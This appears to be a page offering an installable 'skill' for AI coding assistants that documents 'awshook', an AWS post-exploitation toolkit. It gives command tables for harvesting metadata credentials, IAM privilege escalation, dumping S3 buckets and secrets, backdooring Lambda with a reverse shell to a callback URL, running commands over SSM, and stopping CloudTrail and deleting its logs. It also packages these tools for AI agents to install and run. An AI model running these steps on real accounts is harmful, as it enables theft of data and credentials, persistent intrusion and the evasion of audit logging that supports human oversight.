Menu
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Install with Codex or Claude Copy this prompt, paste it into Codex, Claude, or another assistant, and let it review the skill page and install it for you.
Based on SOC occupation classification
| name | aws-postexploit |
| description | AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3 |
| category | post-exploitation |
| tags | ["aws","cloud","post-exploitation","iam","s3","lambda","ssm","cloudtrail","credential-access","defense-evasion","persistence"] |
| tech_stack | ["aws","boto3","python"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-284"] |
| chains_with | ["T1078.004","T1530","T1537","T1562.008","T1098","T1059.009","T1552.005"] |
| prerequisites | ["T1078.004","T1552.005"] |
| version | 1.0 |
AWS post-exploitation uses boto3, the AWS CLI, and direct metadata endpoint access to perform privilege escalation, data exfiltration, and persistence after compromising IAM credentials or gaining EC2 instance access. These tools target IAM misconfigurations, S3 data stores, Secrets Manager, Lambda functions, and SSM for lateral movement.
Before deploying awshook tools, verify:
pip3 install boto3aws sts get-caller-identity to confirm access--region, AWS_DEFAULT_REGION, or profile config# Quick prerequisite check
aws sts get-caller-identity # verify credentials work
aws iam get-user 2>/dev/null || echo "No IAM user (likely role/instance profile)"
python3 -c "import boto3; print('boto3 OK')" # verify boto3
Understand the AWS environment and current permissions.
| Action | Command | Purpose |
|---|---|---|
| IAM enumeration | awshook iam_enum | Map all users, roles, policies; identify privilege escalation paths |
| Metadata harvest | awshook metadata_harvest | Extract IAM role credentials from EC2/ECS/Lambda metadata |
| CloudTrail status | awshook cloudtrail_blind --action status | Check logging configuration before any noisy operations |
Exploit IAM misconfigurations to gain higher privileges.
| Action | Command | Purpose |
|---|---|---|
| PassRole escalation | awshook iam_privesc --method passrole | Create Lambda with admin role via iam:PassRole |
| AssumeRole chain | awshook iam_privesc --method assumerole --role-arn ARN | Assume role with broader permissions |
| Policy attachment | awshook iam_privesc --method attach_policy | Attach AdministratorAccess to current user |
| Access key creation | awshook iam_privesc --method create_key --target-user USER | Create new access key for persistence |
Extract sensitive data from AWS services.
| Action | Command | Purpose |
|---|---|---|
| S3 dump | awshook s3_dump | Find and download sensitive files from all buckets |
| Secrets extraction | awshook secrets_dump | Extract Secrets Manager and SSM Parameter Store values |
| EBS snapshot | awshook ec2_snapshot --volume-id VOL_ID | Snapshot volumes for offline data access |
Establish persistent access to the AWS environment.
| Action | Command | Purpose |
|---|---|---|
| Lambda backdoor | awshook lambda_backdoor --function-name NAME --callback-url URL | Inject reverse shell into Lambda |
| SSM execution | awshook ssm_exec --instance-id ID --command CMD | Execute commands on EC2 via SSM |
Reduce detection footprint.
| Action | Command | Purpose |
|---|---|---|
| Stop CloudTrail | awshook cloudtrail_blind --action stop | Stop CloudTrail logging |
| Delete logs | awshook cloudtrail_blind --action delete_logs | Remove existing CloudTrail logs from S3 |
awshook cleanup_aws
The cleanup tool:
AWS post-exploitation tools are detectable by:
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| iam_enum | IAM user/role/policy enumeration and privesc analysis | T1087.004 — Cloud Account |
| iam_privesc | IAM privilege escalation via PassRole/AssumeRole/Policy | T1098 — Account Manipulation |
| s3_dump | S3 bucket data exfiltration | T1530 — Data from Cloud Storage |
| lambda_backdoor | Lambda function backdoor for persistence | T1525 — Implant Internal Image |
| ssm_exec | Remote command execution via SSM | T1021.007 — Cloud Services |
| metadata_harvest | EC2/ECS/Lambda metadata credential extraction | T1552.005 — Cloud Instance Metadata API |
| cloudtrail_blind | CloudTrail log evasion | T1562.008 — Disable Cloud Logs |
| secrets_dump | Secrets Manager/Parameter Store extraction | T1555.006 — Cloud Secrets Management Stores |
| ec2_snapshot | EBS volume snapshot for data access | T1537 — Transfer Data to Cloud Account |
| cleanup_aws | Resource removal and trail restoration | T1070 — Indicator Removal |
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations